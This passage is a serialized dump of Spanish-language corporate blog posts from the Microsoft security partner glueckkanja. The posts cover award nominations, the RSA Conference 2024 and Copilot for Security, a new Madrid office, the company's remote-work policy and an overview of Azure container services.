Aquellos que llegan a la lista corta han superado a un campo global de líderes de la industria y se cuentan entre la élite en el ámbito de la seguridad.",[2688,2689],"quotes",{":quotes":2688},[12,2691,2692],{},"Los empleados de Microsoft, así como los de las empresas miembros de MISA, pueden votar por sus favoritos en la lista corta hasta el 22 de marzo de 2024. La ceremonia de entrega de los Microsoft Security Excellence Awards en las nuevas y diversas categorías tendrá lugar el 6 de mayo de 2024, en el marco de la RSA Conference, no muy lejos de Hollywood, en San Francisco.",[12,2694,2695],{},"Y ya que estamos compartiendo buenas noticias, aquí va otra: el resultado de nuestra Encuesta de Clientes CSOC 2023. El 100 % de los encuestados afirma estar muy satisfecho con los recursos proporcionados por nuestro CSOC para satisfacer sus necesidades de seguridad, y el 87 % está además muy satisfecho con la pericia de nuestro equipo. Un resultado de encuesta que nos complace especialmente. Después de todo, votan precisamente aquellos para quienes nos esforzamos al máximo todos los días: nuestros clientes.",{"title":65,"searchDepth":111,"depth":111,"links":2697},[],{"lang":2170,"titleClass":2172,"date":2699,"categories":2700,"blogtitlepic":2701,"socialimg":2702,"customExcerpt":2703,"keywords":2704,"hreflang":2705,"quotes":2710},"2024-03-13",[2663],"head-finalist-mssp","/blog/heads/head-finalist-mssp.png","¡glueckkanja está nuevamente en la lista corta para los premios MSSP del Año 2024! 
Justo después de haber aplaudido en Los Ángeles a Christopher Nolan, Cillian Murphy, Emma Stone y al blockbuster Oppenheimer, ya tenemos otra razón para la verdadera alegría de los premios: ¡Nosotros, en glueckkanja, somos finalistas para el premio Security MSSP del Año 2024!","MSSP, Premios MSSP del Año 2024, MSSP de Seguridad, Ciberseguridad, Socio de Microsoft, MISA, Proveedores de Servicios Gestionados de Seguridad, Tecnología de Seguridad de Microsoft, Lista Corta, Premios de Excelencia en Seguridad, Conferencia RSA, San Francisco, Encuesta de Clientes CSOC 2023, Requisitos de Seguridad, Experticia",[2706,2708],{"lang":2260,"href":2707},"/blog/corporate/2024/03/mssp-2024",{"lang":2170,"href":2709},"/blog/corporate/2024/03/mssp-2024-es",{"items":2711},[2712],{"text":2713,"name":2208,"company":2714,"img":2206,"alt":2208},"Nuestros empleados son la clave del éxito. Los clientes valoran la pericia técnica y el contacto personal con nuestros colegas, lo que fomenta una lealtad de largo plazo hacia nuestro servicio. Microsoft ha reconocido esta combinación de conocimiento especializado y entusiasmo por la innovación por segunda vez consecutiva, un logro del que estamos muy orgullosos.","Security Lead","/posts/2024-03-13-mssp-2024",{"title":2680,"description":2686},"posts/2024-03-13-mssp-2024",[2719,2720,2175,2721],"Award","Microsoft","Misa","GZ0F5SH4zl9qvivtuT_HlcxK4-5wV-MPXA2seXEOkhE",{"id":2724,"title":2725,"author":2726,"body":2727,"cta":2165,"description":2731,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2793,"moment":2795,"navigation":2180,"path":2845,"seo":2846,"stem":2847,"tags":2848,"webcast":2167,"__hash__":2850},"content_es/posts/2024-04-30-gk-at-rsac.md","glueckkanja @ Conferencia RSA",[2460],{"type":9,"value":2728,"toc":2788},[2729,2732,2740,2744,2746,2754,2757,2761,2763,2766,2769,2776,2780,2782,2785],[12,2730,2731],{},"Durante más de tres décadas, la Conferencia RSA ha sido una fuerza clave en la comunidad de ciberseguridad. 
En un mundo donde las amenazas de ataques crecen cada día, esta conferencia se ha vuelto esencial para cualquier persona que se ocupe de la seguridad en línea. La conocida conferencia siempre se celebra en el soleada California y glueckkanja participa una vez más.",[12,2733,2734,2735,2739],{},"Como miembro de ",[2630,2736,2738],{"href":2737,"target":2633},"https://www.microsoft.com/de-de/security/business/intelligent-security-association","la Asociación de Seguridad Inteligente de Microsoft (MISA)",", una asociación de importantes socios de seguridad de Microsoft, compartimos el objetivo común de desarrollar soluciones de seguridad de primer nivel y proteger a los clientes de amenazas.",[41,2741,2743],{"id":2742},"ia-en-el-foco-de-la-conferencia-rsa-2024","IA en el foco de la Conferencia RSA 2024",[12,2745,31],{},[12,2747,2748,2749,2753],{},"Este año, Microsoft centra el ",[2630,2750,2752],{"href":2751,"target":2633},"https://www.microsoft.com/en-us/security/blog/2024/04/04/explore-microsofts-ai-innovations-at-rsa-conference-2024","programa de la conferencia"," exclusivamente en Copilot for Security, la innovadora solución de IA diseñada para ayudar a los expertos en seguridad e IT a identificar riesgos no detectados.",[12,2755,2756],{},"Este es un tema emocionante en la discusión actual, en el cual nuestro líder de Seguridad, Jan Geisbauer, está ansioso por participar. En su sesión en el stand de Microsoft (7 de mayo, 17:30 - 17:50) durante la Conferencia RSA, presentará esta nueva tecnología, explorará sus capacidades, pero también abordará sus limitaciones actuales. Hemos resumido los puntos clave aquí.",[41,2758,2760],{"id":2759},"microsoft-copilot-for-security-para-la-detección-de-amenazas","Microsoft Copilot for Security para la Detección de Amenazas",[12,2762,31],{},[12,2764,2765],{},"Durante mucho tiempo, la detección de riesgos dependía de lo que se conoce como 'detección basada en firmas', un método que identifica amenazas basadas en patrones reconocidos. 
Sin embargo, a medida que el panorama de amenazas continúa cambiando y los atacantes adaptan constantemente sus estrategias, este enfoque por sí solo ya no es suficiente para la protección. El próximo avance en tecnología de seguridad implica aprovechar los grandes volúmenes de datos para la detección de amenazas. Las soluciones de software modernas analizan automáticamente conjuntos extensos de datos para detectar patrones y riesgos potenciales. No obstante, para minimizar eficazmente los falsos positivos, la experiencia de especialistas capacitados es esencial. Dada la gran cantidad de datos que deben procesarse, esto requiere recursos significativos. Aquí es exactamente donde entra en juego Microsoft Copilot for Security con soluciones innovadoras diseñadas para respaldar a los equipos de seguridad y mejorar la protección.",[12,2767,2768],{},"Además de resúmenes de los datos más importantes sobre incidentes de seguridad con soluciones sugeridas, Copilot for Security también puede responder a indicaciones sobre ciberseguridad y sus propios sistemas. La herramienta además gestiona tareas más complejas, como la creación de sus propias consultas KQL para extraer datos de seguridad específicos. Una característica particularmente útil es el análisis de scripts, que acelera en gran medida el examen de scripts sospechosos y líneas de comandos.",[12,2770,2771],{},[2772,2773],"img",{"alt":2774,"src":2775},"Una captura de pantalla de la función de análisis de scripts de Copilot for Security de Microsoft","https://res.cloudinary.com/c4a8/image/upload/v1714461543/blog/pics/rsac-copilot-for-security-script-analysis.png",[41,2777,2779],{"id":2778},"agregue-copilot-for-security-a-su-sistema","Agregue Copilot for Security a su sistema",[12,2781,31],{},[12,2783,2784],{},"Como cualquier Modelo de Lenguaje Grande (LLM), Copilot for Security aún requiere la supervisión cuidadosa de expertos. 
Sin embargo, especialmente al analizar datos en bruto, Copilot for Security resulta ser una herramienta potente que permite a los clientes y a los Proveedores de Servicios de Seguridad de Microsoft (MSSP) tomar decisiones más rápidas y mejor informadas.",[12,2786,2787],{},"En glueckkanja, consideramos nuestra misión mejorar constantemente y encontrar nuevas formas innovadoras de proteger a nuestros clientes de las crecientes amenazas digitales de la vida cotidiana. Por lo tanto, recomendamos a nuestros clientes incorporar Copilot for Security en sus sistemas, y estamos ansiosos por ayudarles en la planificación, implementación y utilización de la herramienta.",{"title":65,"searchDepth":111,"depth":111,"links":2789},[2790,2791,2792],{"id":2742,"depth":111,"text":2743},{"id":2759,"depth":111,"text":2760},{"id":2778,"depth":111,"text":2779},{"lang":2170,"seoTitle":2794,"titleClass":2172,"date":2795,"categories":2796,"blogtitlepic":2797,"socialimg":2798,"customExcerpt":2799,"keywords":2800,"contactInContent":2801,"hreflang":2839,"scripts":2844},"glueckkanja en la Conferencia RSA 2024","2024-04-30",[2175],"head-rsa-conference-2024","/blog/heads/head-rsa-conference-2024.png","Del 6 al 9 de mayo de 2024 abre la Conferencia RSA sus puertas, el equipo de glueckkanja, liderado por el CEO Christian Kanja y el líder de Seguridad Jan Geisbauer, estarán presente una vez más. 
Este año, estaremos examinando de cerca el nuevo Microsoft Copilot for Security.","glueckkanja, Conferencia RSA 2024, Microsoft Copilot for Security, Soluciones de Ciberseguridad AI, Premios MISA, MSSP de Seguridad del Año, Detección Basada en Firmas, Asociación de Seguridad Inteligente de Microsoft, Análisis de Seguridad de Big Data, Proveedor de Servicios de Seguridad de Microsoft, Innovación en Ciberseguridad AI, Herramienta de Análisis de Scripts",{"quote":2180,"infos":2802},{"headline":2803,"subline":2804,"level":41,"textStyling":2203,"flush":2204,"person":2805,"form":2820},"Ponte en contacto con nosotros","¿Tienes alguna pregunta? Estamos encantados de ayudarte a hacer tu negocio aún más seguro con Microsoft Copilot for Security.",{"image":2206,"mail":2806,"number":2807,"cloudinary":2180,"alt":2208,"name":2208,"quotee":2208,"quoteeTitle":2714,"quote":2808,"detailsHeader":2809,"details":2810},"sales@glueckkanja.com","+49694005520","Trabajar con Copilot for Security es como llevar un exoesqueleto para los analistas. Todas sus habilidades y conocimientos son repentinamente y masivamente amplificados. En glueckkanja amamos Copilot for Security. 
Jan Geisbauer Líder de Seguridad.","¡Esperamos tener noticias tuyas!",[2811,2816],{"text":2812,"href":2813,"details":2814,"icon":2815},"+49 69 4005520","tel:+49 69 4005520","Call now","site/phone",{"text":2817,"href":2818,"icon":2819},"info@glueckkanja.com","mailto:info@glueckkanja.com","site/mail",{"ctaText":2821,"cta":2822,"method":2168,"action":2215,"fields":2823},"Send",{"skin":2214},[2824,2826,2828,2831,2834,2836,2838],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},"Introduce tu nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":2827},"Introduce tu empresa.",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},"Correo electrónico*","Introduce tu correo electrónico.",{"label":2832,"type":2236,"id":2237,"required":2180,"requiredMsg":2833},"Tus datos serán almacenados por nosotros para procesar y responder a tu solicitud. Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/en/privacy\">Política de privacidad\u003C/a>.","Confírmalo",{"type":2240,"id":2246,"value":2835},"Solicita asesoramiento de Seguridad a Copilot",{"type":2240,"id":2249,"value":2837},"nis2-consulting",{"type":2240,"id":2252},[2840,2842],{"lang":2260,"href":2841},"/blog/security/2024/04/gk-at-rsac",{"lang":2170,"href":2843},"/blog/security/2024/04/gk-at-rsac-es",{"slick":2180,"form":2180},"/posts/2024-04-30-gk-at-rsac",{"title":2725,"description":2731},"posts/2024-04-30-gk-at-rsac",[2849,2676,2175],"MISA","LWXLyTFAys2dZKO6PJVm5ZtBwXiGDtrj8Yr7vJbD388",{"id":2852,"title":2853,"author":2854,"body":2855,"cta":2165,"description":2859,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2897,"moment":2899,"navigation":2180,"path":2952,"seo":2953,"stem":2954,"tags":2955,"webcast":2167,"__hash__":2957},"content_es/posts/2024-05-27-gk-in-spain.md","Viva España, Viva La 
felicidadkanja",[2499],{"type":9,"value":2856,"toc":2893},[2857,2860,2864,2866,2869,2881,2885,2887,2890],[12,2858,2859],{},"Lamentamos todo esto, queridos españoles, pero por suerte algunos de nosotros ya estamos aquí: ¡los de la eficacia, los de la fiabilidad, los de la tecnología alemana!",[41,2861,2863],{"id":2862},"glueckkanja-abre-su-primera-oficina-en-españa","glueckkanja abre su primera oficina en España",[12,2865,31],{},[12,2867,2868],{},"Desde principios de año, también tenemos una oficina glueckkanja en Madrid. En glueckkanja Ibérica encontrará a nuestro equipo en la calle de Goya 36, en el barrio de Salamaca, no lejos de la Basílica de la Concepción de Nuestra Señora y del vibrante centro de Madrid.",[12,2870,2871,2872,1884,2876,2880],{},"Desde la capital de España, proporcionamos a las empresas de toda la Península Ibérica nuestra experiencia concentrada en el área de la ciberseguridad. Como uno de los socios estratégicos más importantes de Microsoft en todo el mundo y como socio de Microsoft España, ofrecemos soluciones de seguridad como ",[2630,2873,2875],{"href":2874},"/es/security/cloud-security-operations-center","CSOC (Cloud Security Operation Center)",[2630,2877,2879],{"href":2878},"/es/azure/azure-emergency-response-environment","AzERE (Azure Emergency Response Environment)"," como paquetes individuales que pueden integrarse en los procesos existentes. Esta estrategia no sólo ofrece conveniencia para nuestros clientes y crea sinergias prácticas en la implementación, sino que es particularmente prometedora en España: después de todo, España es uno de los países más afectados por los ciberataques.",[41,2882,2884],{"id":2883},"ingeniería-alemana-con-pasión-española","Ingeniería alemana con pasión española",[12,2886,31],{},[12,2888,2889],{},"Nuestra forma de trabajar es tan eficiente (¡típicamente alemana!) como única. 
El servicio de CSOC lo gestiona y controla nuestro equipo de grandes expertos de Ciber seguridad para nuestros clientes - nuestros análisis y todos los servicios se llevan a cabo con una gran parte de pasión española y una amplia comprensión del mercado ibérico.",[12,2891,2892],{},"¿Por qué no nos hace una visita en la calle Goya? Estaremos encantados de informarte personalmente sobre toda nuestra gama de servicios cibernéticos. En español o en alemán - ¡como tú quieras!",{"title":65,"searchDepth":111,"depth":111,"links":2894},[2895,2896],{"id":2862,"depth":111,"text":2863},{"id":2883,"depth":111,"text":2884},{"lang":2170,"seoTitle":2898,"titleClass":2172,"date":2899,"categories":2900,"blogTitleImages":2901,"blogtitlepic":2912,"socialimg":2913,"customExcerpt":2914,"keywords":2915,"contactInContent":2916,"hreflang":2946,"scripts":2951},"glueckkanja abre la primera oficina en España","2024-05-27",[2663],[2902,2904,2906,2908,2910],{"img":2903,"cloudinary":2180},"/blog/heads/head-spain-reserved-es.png",{"img":2905,"cloudinary":2180},"/blog/heads/head-spain-temperature-es.png",{"img":2907,"cloudinary":2180},"/blog/heads/head-spain-hacker-es.png",{"img":2909,"cloudinary":2180},"/blog/heads/head-spain-cyberattack-es.png",{"img":2911,"cloudinary":2180},"/blog/heads/head-spain-pronunciation-es.png","head-spain-reserved-es","/heads/head-spain-reserved-es.png","¿Quién no los conoce? ¿Los alemanes que salen discretamente de su habitación a primera hora de la mañana para reservar rápidamente las mejores tumbonas junto a la piscina (¡incluso antes que los ingleses!). ¿O los que llevan calcetines de tenis blancos con sandalias? ¿Los que se beben la sangría en un cubo con pajitas? 
¿Los que dicen Pa-ella en vez de Paeja (y Ma-llorca en vez de Mallorca)?","glueckkanja, Madrid, Empresa alemana en España, Ciberseguridad, Microsoft, Ingenieria alemana, glueckkanja Iberica",{"quote":2180,"infos":2917},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":2920,"form":2931},"Contacta ahora","¿Quieres saber qué podemos hacer por ti en España? Estaremos encantados de asesorarte sobre nuestros servicios y tecnologías., ¡y esperamos Esperamos tus noticias!",{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":2925},"/people/people-juan-jose-fernandez.jpg","Regional Sales Manager","Nuestra nueva oficina de Madrid combina la precisión alemana con la pasión española por nuestras soluciones de seguridad esbeltas e innovadoras, que generan confianza con nuestros clientes y se basan en la última tecnología combinada con las necesidades de nuestros clientes. las raíces locales.","Esperamos tener noticias tuyas.",[2926,2930],{"text":2927,"href":2928,"details":2929,"icon":2815},"+34 680 225643","tel:+34 680 225643","Llama ahora",{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":2932,"method":2168,"action":2215,"fields":2933},{"skin":2214},[2934,2935,2937,2938,2941,2943,2945],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},"La empresa*",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},"Tus datos serán almacenados por nosotros para procesar y responder a tu consulta. 
Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/es/privacy\">política de privacidad\u003C/a>.","Confirma, por favor",{"type":2240,"id":2246,"value":2942},"Servicios de consulta en España",{"type":2240,"id":2249,"value":2944},"gk-in-spain",{"type":2240,"id":2252},[2947,2949],{"lang":2260,"href":2948},"/blog/corporate/2024/05/gk-in-spain",{"lang":2257,"href":2950},"/blog/corporate/2024/05/gk-in-spain-en",{"slick":2180,"form":2180},"/posts/2024-05-27-gk-in-spain",{"title":2853,"description":2859},"posts/2024-05-27-gk-in-spain",[2175,2956,2720],"Spain","fjOMTkVe5YWQChjZ9FmaULwK7oLhJ_iwYhqavYCaChk",{"id":2959,"title":2960,"author":2961,"body":2962,"cta":2165,"description":2966,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2980,"moment":2982,"navigation":2180,"path":3021,"seo":3022,"stem":3023,"tags":3024,"webcast":2167,"__hash__":3026},"content_es/posts/2024-06-26-partner-of-the-year-2024.md","Partner of the Yeah, Yeah, Yeah, Year!",[2460],{"type":9,"value":2963,"toc":2978},[2964,2967,2970],[12,2965,2966],{},"A partir de hoy, es oficial: ¡Somos una vez más Partner of the Year de Microsoft! Entre un grupo mundial de los mejores socios de Microsoft, hemos sido galardonados en 2024 por nuestro extraordinario rendimiento y nuestras innovadoras soluciones para clientes basadas en tecnologías de Microsoft. Con más de 4.700 nominaciones y participantes de más de 100 países, ¡hemos llegado a lo más alto! Extendemos nuestro más sincero agradecimiento a todo el equipo de Microsoft. Siempre es maravilloso saber cuánto aprecia nuestro trabajo para nuestros clientes. Todos en glueckkanja estamos encantados de teneros como socios.",[12,2968,2969],{},"Este año hemos recibido el premio \"Partner of the Year\" por transformar los espacios de trabajo digitales de un banco del norte de Alemania. El reto consistía en establecer nuevos estándares de innovación y agilidad en las soluciones de gestión de terminales. 
Con nuestras soluciones de puesto de trabajo basadas en la nube y desarrolladas por nosotros mismos, basadas en Microsoft E5 y Windows 365, pudimos mejorar la seguridad, la eficacia y la satisfacción, reduciendo al mismo tiempo los costes y aumentando la productividad. Esto no sólo redefinió el espacio de trabajo digital del cliente, sino que nos consolidó como líderes del mercado en soluciones modernas de gestión de terminales. Si quieres saber más sobre nuestro caso de \"Partner of the Year\" y nuestro premio, estaremos encantados de presentarte personalmente el proceso de transformación.",[12,2971,2972,2973,2977],{},"Ahora, nos vamos a celebrarlo, y te recomendamos que consultes la lista completa de ganadores y finalistas, que puedes encontrar ",[2630,2974,2976],{"href":2975},"https://aka.ms/2024POTYAWinnersFinalists","aquí",". Una vez más, enhorabuena a todos los ganadores y finalistas de parte de todos nosotros.",{"title":65,"searchDepth":111,"depth":111,"links":2979},[],{"lang":2170,"seoTitle":2981,"titleClass":2172,"date":2982,"categories":2983,"blogtitlepic":2984,"socialimg":2985,"customExcerpt":2986,"keywords":2987,"contactInContent":2988,"hreflang":3015,"scripts":3020},"glueckkanja es Microsoft Partner of the Year 2024","2024-06-26",[2663],"head-partner-of-the-year-2024","/heads/head-partner-of-the-year-2024.jpg","Una vez es sólo el principio, y cinco veces te sitúa en el establecimiento. Pero, ¿qué dices a ser nombrado 'Partner of the Year' de Microsoft por octava vez? 
Nosotros decimos: Partner of the Yeah, Yeah, Yeah, Year!","POY, Award, Microsoft Partner of the Year 2024, Transformation process, Endpoint Management, Microsoft E5, Windows 365, Country Partner of the Year",{"quote":2180,"infos":2989},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":2994,"level":41,"textStyling":2203,"flush":2204,"person":2995,"form":3003},"var(--color-secondary)","var(--color-copy)","var(--color-blue-medium)","var(--color-white)","¿Quieres profundizar en nuestro caso y premio? Nos encantaría guiarte personalmente a través de nuestro proceso de transformación. ¡Ponte en contacto con nosotros!",{"image":2996,"cloudinary":2180,"alt":2419,"name":2419,"quotee":2419,"quoteeTitle":2997,"quote":2998,"detailsHeader":2924,"details":2999},"/people/people-christian-kanja.jpg","CEO","Este premio no es sólo un honor, sino una motivación. Muchísimas gracias a nuestro fantástico equipo de glueckkanja, a nuestra increíble colaboración con los clientes y, por supuesto, a nuestros compañeros de Microsoft. Juntos, hemos logrado grandes cosas y tenemos metas aún mayores por delante.",[3000,3002],{"text":2812,"href":2813,"details":3001,"icon":2815},"Jetzt anrufen",{"text":2817,"href":2818,"icon":2819},{"ctaText":2821,"cta":3004,"method":2168,"action":2215,"fields":3005},{"skin":2214},[3006,3007,3008,3009,3011,3013,3014],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":3010,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},"Tus datos serán almacenados por nosotros para procesar y responder a tu consulta. 
Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/en/privacy\">política de privacidad\u003C/a>.",{"type":2240,"id":2246,"value":3012},"Consulta POY Case",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3016,3018],{"lang":2260,"href":3017},"/blog/corporate/2024/06/partner-of-the-year-2024",{"lang":2257,"href":3019},"/blog/corporate/2024/06/partner-of-the-year-2024-en",{"slick":2180,"form":2180},"/posts/2024-06-26-partner-of-the-year-2024",{"title":2960,"description":2966},"posts/2024-06-26-partner-of-the-year-2024",[2719,3025],"Partner of the Year","c_AaDStqmQda1pPRBz-tuZk9aFx2eSoapPi3bJKrW6A",{"id":3028,"title":3029,"author":3030,"body":3031,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3077,"moment":3079,"navigation":2180,"path":3091,"seo":3092,"stem":3093,"tags":3094,"webcast":2167,"__hash__":3099},"content_es/posts/2024-07-08-homeoffice.md","Porque importa más el qué que el dónde",[2504],{"type":9,"value":3032,"toc":3074},[3033,3037,3040,3043,3046,3049],[186,3034,3036],{"id":3035},"en-glueckkanja-puedes-seguir-trabajando-multimóvil","En glueckkanja, puedes seguir trabajando multimóvil.",[12,3038,3039],{},"A diferencia de muchas otras empresas de TI, puedes seguir trabajando con nosotros con la movilidad que conoces y que tanto te ha gustado en los últimos años. Aparte de los mejores resultados laborales, creemos que hay muchas otras razones a favor del trabajo desde casa y el trabajo multimóvil. Menos estrés, mejor compatibilidad de trabajo y familia, un equilibrio óptimo entre vida laboral y familiar, más flexibilidad y mucho más tiempo personal -gracias a la eliminación de los desplazamientos- son sólo algunas de ellas.",[12,3041,3042],{},"Por cierto, la Universidad Técnica de Darmstadt también consiguió interesantes datos sobre este tema en una encuesta realizada entre diciembre de 2022 y marzo de 2023. 
Según sus propias estimaciones, más del 75% de los empleados en puestos de oficina son eficaces cuando trabajan desde casa. El 60% afirma que trabaja con más éxito desde casa y que también está más satisfecho. Más del 40% incluso renunciaría si tuviera que volver a trabajar exclusivamente en la oficina.",[12,3044,3045],{},"Esta encuesta reafirma nuestra opinión. Por tanto, mantenemos nuestra política de libre elección del lugar de trabajo. Con ello, nos oponemos firmemente a la tendencia actual del sector de volver a políticas de oficina rígidas con una flexibilidad limitada. Si tú también te resistes a esta tendencia, tenemos algo interesante para ti: ¡nuestras vacantes!",[12,3047,3048],{},"Aquí encontrarás empleos flexibles con un gran equilibrio entre vida laboral y personal:",[52,3050,3056],{"className":3051},[3052,3053,3054,3055],"cta-list","d-inline-block","mt-2","mb-2",[2630,3057,3069],{"role":3058,"className":3059,"dataText":3066,"href":3067,"type":3068},"button",[3060,3061,3062,3063,3064,3065],"cta","btn","w-100","w-lg-auto","btn-primary","vue-component","A las ofertas de empleo","/es/job-offers","Button",[102,3070,3073],{"className":3071},[3072],"cta__text","To the job offers",{"title":65,"searchDepth":111,"depth":111,"links":3075},[3076],{"id":3035,"depth":329,"text":3036},{"lang":2170,"seoTitle":3078,"titleClass":2172,"date":3079,"categories":3080,"blogtitlepic":3081,"socialimg":3082,"customExcerpt":3083,"keywords":3084,"hreflang":3085,"scripts":3090},"Trabajo multimóvil en glueckkanja: menos estrés y un mejor equilibrio entre trabajo y vida privada","2024-07-08",[2663],"head-homeoffice-zuse-en","/blog/heads/head-homeoffice-zuse-en.png","¿Has oído hablar del escritorio de Konrad Zuse? ¿Sabes cómo es? ¿Si era grande o pequeño? ¿Ordenado o caótico? ¿Minimalista o lleno de notas personales? ¿No? ¿Nunca? No te preocupes: nosotros tampoco. 
Y hay una buena razón para ello: simplemente no importa dónde o en qué entorno tengas tus ideas brillantes, lo único que cuenta es la calidad de esas ideas.","Remote Jobs, Flexible Working, Work-Life Balance, Balancing Career and Family, Working Remotely, Multimobile Working, Stress-Free Work, Choice of Workplace, Satisfaction in Home Office, Jobs in IT Companies",[3086,3088],{"lang":2260,"href":3087},"/blog/corporate/2024/07/homeoffice",{"lang":2257,"href":3089},"/blog/corporate/2024/07/homeoffice-en",{"slick":2180,"form":2180},"/posts/2024-07-08-homeoffice",{"title":3029,"description":65},"posts/2024-07-08-homeoffice",[3095,3096,3097,3098],"Employer Branding","Top Employer","Recruiting","Homeoffice","asu2YUwhf7WOnxyp1lPiuPvBk_JnyYUv_uaKiseRzF0",{"id":3101,"title":3102,"author":3103,"body":3104,"cta":2165,"description":3108,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3239,"moment":3241,"navigation":2180,"path":3276,"seo":3277,"stem":3278,"tags":3279,"webcast":2167,"__hash__":3283},"content_es/posts/2024-07-12-containers-on-azure.md","Azure Container Services: modernos, eficaces e indispensable",[2509],{"type":9,"value":3105,"toc":3233},[3106,3109,3112,3115,3119,3121,3124,3127,3158,3161,3164,3168,3170,3173,3179,3182,3185,3188,3191,3195,3197,3200,3206,3215,3221,3224,3228,3230],[12,3107,3108],{},"En nuestro mundo acelerado, las empresas se enfrentan constantemente a nuevos desafíos que requieren soluciones rápidas y flexibles. Los contenedores son una tecnología clave que cumple estos requisitos. Estos permiten hacer que los procesos de desarrollo y despliegue de software sean más eficientes y se adapten al vertiginoso ritmo de la transformación digital.",[12,3110,3111],{},"Los contenedores, componentes básicos de los modernos flujos de trabajo CI/CD, ofrecen un entorno de ejecución minimalista y eficiente que incluye únicamente los componentes esenciales necesarios para ejecutar una aplicación. 
Al separar los componentes adicionales proporcionados por el sistema host, los contenedores reducen significativamente los tiempos de arranque y actualización.",[12,3113,3114],{},"La pregunta que se plantea ahora es: ¿cómo aprovechar y gestionar mejor este potencial?",[41,3116,3118],{"id":3117},"soluciones-de-contenedores-en-azure","Soluciones de contenedores en Azure",[12,3120,31],{},[12,3122,3123],{},"Microsoft Azure ofrece una amplia gama de opciones para utilizar contenedores. Las opciones van desde soluciones totalmente gestionadas, en las que Microsoft se hace cargo de gran parte de la configuración de la infraestructura, hasta soluciones de gestión ligera, en las que la gestión y el mantenimiento del sistema host son responsabilidad del cliente.",[12,3125,3126],{},"Aquí hay una lista de las opciones de alojamiento de contenedores en Azure, desde Light hasta Full Managed:",[1255,3128,3129,3137,3144,3151],{},[1258,3130,3131],{},[2630,3132,3136],{"href":3133,"rel":3134},"https://learn.microsoft.com/es-es/azure/aks/what-is-aks",[3135],"nofollow","Azure Kubernetes Services (AKS)",[1258,3138,3139],{},[2630,3140,3143],{"href":3141,"rel":3142},"https://learn.microsoft.com/es-es/azure/container-instances/container-instances-overview",[3135],"Azure Container Instances (ACI)",[1258,3145,3146],{},[2630,3147,3150],{"href":3148,"rel":3149},"https://azure.microsoft.com/es-es/products/app-service/containers/?activetab=pivot:deploytab",[3135],"Azure WebApp for Containers",[1258,3152,3153],{},[2630,3154,3157],{"href":3155,"rel":3156},"https://learn.microsoft.com/es-es/azure/container-apps/overview",[3135],"Azure Container Apps (ACA)",[12,3159,3160],{},"Cada uno de estos servicios ofrece sus propias ventajas en función del caso de uso previsto.",[12,3162,3163],{},"Azure Container Registry (ACR) permite el almacenamiento centralizado de contenedores en su propio entorno Azure y ofrece una solución integrada para utilizar ACR como fuente de las imágenes de contenedor 
utilizadas.",[41,3165,3167],{"id":3166},"destacado-azure-container-apps","Destacado: Azure Container Apps",[12,3169,31],{},[12,3171,3172],{},"La más reciente opción de alojamiento de contenedores de Microsoft es Azure Container Apps (ACA). A diferencia de AKS, Microsoft gestiona por completo los Kubernetes subyacentes, incluidas las actualizaciones y el escalado.",[12,3174,3175],{},[2772,3176],{"alt":3177,"src":3178},"Container Apps Basic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-container-apps-example-scenarios.png",[12,3180,3181],{},"Como base sirve un Azure Container App Environment, en el que Microsoft proporciona recursos Kubernetes totalmente gestionados que pueden ser utilizados por las aplicaciones. Los distintos perfiles de carga de trabajo ofrecen diversas combinaciones de CPU/RAM y también el uso de sistemas GPU.",[12,3183,3184],{},"La principal ventaja de esta solución es que el usuario puede centrarse únicamente en su aplicación y su configuración específica, sin tener que gestionar el clúster.",[12,3186,3187],{},"ACA ofrece diversas formas de conectar fácilmente las aplicaciones con otros servicios de Azure. Por ejemplo, FileShares de una cuenta de almacenamiento Azure puede integrarse en sus contenedores para asegurar datos persistentes entre reinicios o cambios de versión de la aplicación.",[12,3189,3190],{},"Otra característica de ACA son las pruebas A/B o Green/Blue, en las que se ejecutan simultáneamente dos versiones de una aplicación. El tráfico entrante se divide entre las instancias en ejecución, lo que permite conocer rápidamente la fase actual de desarrollo y corregir errores de inmediato.",[41,3192,3194],{"id":3193},"ejemplo-práctico-github-runner-en-azure-container-apps","Ejemplo práctico: GitHub Runner en Azure Container Apps",[12,3196,31],{},[12,3198,3199],{},"Un ejemplo práctico: los workflows CI/CD requieren un entorno en el que puedan ejecutarse. 
